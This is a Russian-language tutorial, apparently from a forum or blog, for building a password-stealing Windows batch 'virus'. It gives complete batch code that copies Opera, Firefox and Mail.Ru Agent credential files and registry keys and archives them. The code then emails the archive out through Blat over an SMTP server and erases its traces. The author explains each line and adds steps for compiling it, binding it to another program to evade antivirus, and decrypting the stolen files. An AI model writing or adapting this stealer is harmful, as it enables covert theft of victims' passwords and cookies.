В этой статье опишу как можно быстро и без особого труда,написать и сделать вирус ворующий файлы с паролями и отправляющий всё это на почтовый ящик.
Начнём с того что вирус будет написан на bat'e(CMD,основные команды Вы можете взять здесь) то есть в обычном текстовом файле и будет выполняться при помощи стандартного,встроенного интреператора Windows-"командной строки".
Для того чтоб написать подобный вирус,нужно знать точное место хранения тех файлов которые и будет он воровать, компоненты Blat которые можно скачать с офф сайта http://www.blat.net/ или же с нашего сервера,так же компонент от архиватора WinRaR Rar.exe(можно обойтись и без него).
Открываем блокнот и копируем туда следующий код:
Код:
@echo off
md %systemroot%\wincs
md %SystemDrive%\pass\
md %SystemDrive%\pass\opera\
md %SystemDrive%\pass\Mozilla\
md %SystemDrive%\pass\MailAgent\
md %SystemDrive%\pass\MailAgent\reg
attrib %systemroot%\wincs +h +s +r
attrib %SystemDrive%\pass +h +s +r
copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"
copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"
copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"
CD /D %APPDATA%\Opera\Opera\
copy /y wand.dat %SystemDrive%\pass\opera\wand.dat
copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3
CD /D %APPDATA%
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul
cd %AppData%\Mozilla\Firefox\Profiles\*.default\
copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite
copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db
copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite
copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul
del /s /q %SystemRoot%\Rar.exe
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\
copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar
cd %systemroot%\wincs
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f логин@yandex.ru -u логин -pw Пароль
ren *.rar pass.rar
%systemroot%\wincs\blat.exe -body FilesPassword -to логин@yandex.ru -attach %systemroot%\wincs\pass.rar
rmdir /s /q %SystemDrive%\pass
rmdir /s /q %systemroot%\wincs
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll
del /s /q %systemroot%\blat.lib
attrib +a +s +h +r %systemroot%\wind.exe
EXIT
cls
Не много распишу код самого батинка.
@echo off - скрывает тело батинка( так то она и не нужна,ну всё же)
md %systemroot%\wincs - создаёт папку wincs в системной папке Windows не зависимо от того на каком диске она установлена или как она названа.
md %SystemDrive%\pass\ - создаёт папку pass на диске куда установлена система Windows.
md %SystemDrive%\pass\opera\ - создаёт папку opera куда в дальнейшем будет копироваться wand.dat и cookies4.dat от браузера Opera (до 11* версий опера хранит свои пароли в файле wand.dat )
md %SystemDrive%\pass\Mozilla\ - создаёт папку Mozilla куда в дальнейшем будут копироваться файлы от браузера Mozilla (cookies.sqlite,key3.db,signons.sqlite) в которых храняться пароли.
md %SystemDrive%\pass\MailAgent\ - создаёт папку MailAgent в которую будут копироваться файлы содержащие в себе историю переписки и ключи реестра( хранящие в себе пароли) от Маил Агента.
md %SystemDrive%\pass\MailAgent\reg - создаёт папку reg
attrib %systemroot%\wincs +h +s +r - ставит атрибуты на папку wincs тем самым скрывая её от глаз.
attrib %SystemDrive%\pass +h +s +r - тоже самое что и выше.
copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" - копирует файл blat.exe с места выгрузки в папку wincs
copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" - копирует файл blat.dll с места выгрузки в папку wincs
copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" - копирует файл blat.lib с места выгрузки в папку wincs
CD /D %APPDATA%\Opera\Opera\ - переходит в папку оперы где располагаются файлы с паролями ( и не только) от оперы.
copy /y wand.dat %SystemDrive%\pass\opera\wand.dat - копирует файл wand.dat в папку opera
copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat - копирует файл cookies4.dat в папку opera
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 - экспортирует ключ реестра magent_logins2 где хранится пароль, в папку reg
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3 - экспортирует ключ реестра magent_logins3 где хранится пароль, в папку reg
CD /D %APPDATA% - переходим в папку AppData
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul - копирует содержимое папки Mra\Base в папку MailAgent
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul - копирует файл ver.txt в папку MailAgent
cd %AppData%\Mozilla\Firefox\Profiles\*.default\ - переходим в папку с профилем браузера Мозилы
copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite - копирует файл cookies.sqlite в папку Mozilla
copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db - копирует файл key3.db в папку Mozilla
copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite - копирует файл signons.sqlite в папку Mozilla
copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul - копирует компонент архиватора WinRar Rar.exe в папку pass
del /s /q %SystemRoot%\Rar.exe - удаляет компонент архиватора из папки Windows
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- архивируем содержимое папки pass
copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar копируем созданный архив в папку wincs
cd %systemroot%\wincs - переходим в папку wincs
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f логин@yandex.ru -u логин -pw Пароль - готовит программу Blat к отправки архив указывая данные для авторизации и отправки письма.Не забудьте указать свои данные от почтового ящика,от куда будет отправляться письмо с архивом.
ren *.rar pass.rar - на всякий случай если архив в ходе не принял не правильное имя,мы его ещё раз переименуем в pass.rar
%systemroot%\wincs\blat.exe -body Files Password -to логин@yandex.ru -attach %systemroot%\wincs\pass.rar - указываем на какой почтовый адрес будет послано письмо и отсылаем его.
rmdir /s /q %SystemDrive%\pass - удаляем папку pass
rmdir /s /q %systemroot%\wincs - удаляем папку wincs
del /s /q %systemroot%\blat.exe - удаляем компоненты Blat из папки Windows.
del /s /q %systemroot%\blat.dll - удаляем компоненты Blat из папки Windows.
del /s /q %systemroot%\blat.lib - удаляем компоненты Blat из папки Windows.
attrib +a +s +h +r %systemroot%\wind.exe - ставим на себя атрибуты тем самым скрываем себя от глаз.
EXIT - завершаем процесс батинка и выходим.
cls - очищаем вывод каких либо строк в интреператоре.
Скопировали,сохраняем как wind.bat и компилируем в exe при помощи программы Bat to exe converter ,далее собираем всё в кучу,то есть берём компоненты программы Blat и компонент архиватора WinRar (скачать можно здесь) и склеиваем в один исполняемый файл,или же с какой нибудь программой, путь выгрузки всех фалов должен быть %SystemRoot% или %WindowsDir% или %windir%.
В итоге мы получаем вирус который не будет палиться антивирусами и будет отправлять архив с файлами к Вам на почту.Файлы которые придут на почту,можно расшифровать с помощью multi-password-recovery ,правда не все,а только wand.dat от оперы и то если её не обновляли до 11*версий.Все остальные файлы можно расшифровать заменив на свои.
На этом я думаю можно закончить,если же у Вас возникнут какие либо вопросы,не стесняйтесь задавайте.
Спасибо за внимание,всего доброго!
|